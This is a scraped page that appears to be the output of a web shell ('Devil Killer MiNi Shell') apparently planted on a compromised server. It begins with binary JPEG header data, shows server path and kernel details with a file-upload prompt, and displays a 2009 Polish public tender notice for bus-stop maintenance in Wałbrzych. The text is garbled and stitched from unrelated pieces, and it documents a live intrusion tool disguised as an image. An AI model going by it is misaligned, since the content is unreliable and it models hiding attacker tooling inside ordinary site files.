JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090128/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090128/29803-N-2009.html

<p class="kh_header"><b>Wałbrzych: Bieżące utrzymanie i konserwacja  urządzeń  przystankowych komunikacji miejskiej
na  terenie miasta Wałbrzycha.</b><br>
<b>Numer ogłoszenia: 29803 - 2009; data zamieszczenia: 28.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg i Komunikacji , ul. Armii Krajowej 35, 58-302 Wałbrzych, woj. dolnośląskie, tel. 074 6414400, 6414408, faks (074) 6414404.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdik.walbrzych.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budzetowa Gminy Wałbrzych.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bieżące utrzymanie i konserwacja  urządzeń  przystankowych komunikacji miejskiej
na  terenie miasta Wałbrzycha..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia  są prace związane z technicznym utrzymaniem przystanków.

Zamówienie  obejmuje bieżące utrzymanie i konserwację urządzeń  przystankowych komunikacji miejskiej na  terenie miasta Wałbrzycha.

Zakres rzeczowy: 249 przystanków; 104 wiaty. 

Uwaga: Zakres rzeczowy może ulec zmniejszeniu w trakcie realizacji zamówienia, w przypadku gdy Zamawiający zawrze umowę użytkowania wiaty przystankowej w celach reklamowych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 63.71.21.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 365.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
a) spełniają warunki określone w art. 22 ust. 1 Ustawy,
b) dysponują lub będą dysponować niezbędnymi narzędziami i urządzeniami do wykonania 
                 zamówienia ( sprzętem i transportem). Niezbędne minimum sprzętowe i transportowe 
    przedstawia się następująco:
				- samochód dostawczy  min.  0,9 t			       - 1 szt.
				- agregat przewoźny (przenośny) prądotwórczo-spawalniczy - 1 szt.	
c) dysponują lub będą dysponować do realizacji zamówienia  grupą roboczą składającą się z 
                 minimum 3 pracowników,  w tym: 2  pracowników na stanowiskach robotniczych i 
                1 pracownikiem z uprawnieniami do nadzorowania tych prac,
d) wykonali w okresie ostatnich 3 lat  przed dniem wszczęcia postępowania 
     o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - 
     w tym okresie, co najmniej jedno zamówienie odpowiadające swoim rodzajem  
     usługom  stanowiącym przedmiot zamówienia  tj. prowadzili prace utrzymaniowe
     i konserwacyjne urządzeń  przystankowych komunikacji miejskiej (wiaty, ławki
     itp.)  lub  prace związane z inżynierią ruchu drogowego (utrzymanie i konserwacja
                  oznakowania pionowego i innych urządzeń związanych z pasem drogowym) lub 
		     inne prace utrzymaniowo- konserwacyjne budynków gospodarczych, tymczasowych 
                  obiektów budowlanych, obiektów małej architektury, itp.

Ocena, czy Wykonawca spełnia przedstawione wyżej warunki udziału w postępowaniu, zostanie 
dokonana zgodnie z kryterium spełnia/nie spełnia na podstawie analizy załączonych do oferty dokumentów (określonych w pkt  4 SIWZ) potwierdzających spełnienie ww. warunków udziału w 
postępowaniu..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> a.	Aktualny odpis/y  z właściwego rejestru albo aktualne  zaświadczenie/a o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru  lub zgłoszenia do ewidencji działalnosci gospodarczej, wystawione  nie wcześniej niż  6 miesięcy przed upływem terminu składania ofert,  
b.	oświadczenie, że Wykonawca  spełnia wymogi zgodnie z art. 22 ust. 1 ustawy, 
c.	oświadczenie, że Wykonawca nie podlega wykluczeniu z postępowania na podstawie art.  24 ustawy,                 
d.	oświadczenie Wykonawcy o nie zaleganiu z opłacaniem podatków we właściwym Urzędzie Skarbowym (za okres ostatnich  3 miesięcy przed upływem terminu składania ofert)  lub że Wykonawca uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty  zaległych  płatności, lub że wstrzymano w całości wykonanie decyzji organu podatkowego,
e.	oświadczenie Wykonawcy o  nie zaleganiu  we właściwym oddziale Zakładu Ubezpieczeń Społecznych lub Kasie Rolniczego Ubezpieczenia Społecznego  z opłacaniem opłat i składek  na ubezpieczenie zdrowotne lub społeczne (za okres ostatnich  3 miesięcy  przed upływem terminu składania ofert)  lub że Wykonawca uzyskał zgodę na zwolnienie,  odroczenie lub rozłożenie na raty zaległych płatności,) lub wstrzymano w całości  wykonanie decyzji właściwego organu,
f.	wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonaniu zamówienia ( wraz z informacjami nt. ich kwalifikacji zawodowych - posiadanych uprawnień, a także zakres wykonywanych przez nich czynności).
	                       Osoba przewidziana do nadzorowania prac musi posiadać uprawnienia budowlane lub   
	                       drogowe (należy przedłożyć kserokopię uprawnień) i być członkiem Okręgowej Izby
	                       Inżynierów Budownictwa (należy przedłożyć aktualne zaświadczenie),
g.	pisemne zobowiązanie innych podmiotów do udostępnienia pracowników zdolnych do wykonania zamówienia - Wykonawca załącza tylko wtedy, jeżeli w wykazie, o którym mowa w pkt f, wskazał osoby, którymi będzie dysponował,
h.	wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń (sprzętu  i transportu), którymi dysponuje lub będzie dysponował Wykonawca  z uwzględnieniem sprzętu i transportu minimalnego określonego w pkt. 3c SIWZ,
i.	pisemne zobowiązanie innych podmiotów do udostępnienia narzędzi i urządzeń- Wykonawca załącza tylko wtedy, jeżeli w wykazie o którym mowa w pkt. h wskazał narzędzia i urządzenia, którymi będzie dysponował,
j.	Wykonawca musi bezwzględnie podać wykaz ważniejszych  usług (wykaz ten stanowi doświadczenie Wykonawcy) odpowiadających swoim rodzajem  usługom stanowiącym przedmiot zamówienia zrealizowanych w ciągu  ostatnich  trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Należy podać datę wykonywania usługi,    przedmiot usługi oraz zleceniodawców tych usług wraz   z załączeniem dokumentów, że usługi  te zostały wykonane należycie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.zdik.walbrzych.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg i Komunikacji w Wałbrzychu
ul. Armii Krajowej 35
58-302 Wałbrzych, pokój nr 103
Cena: 10,50 zł.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.02.2009 godzina 10:00, miejsce: Zarząd Dróg i Komunikacji w Wałbrzychu
ul. Armii krajowej 35
58-302 Wałbrzych, sekretariat pokój nr 108.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com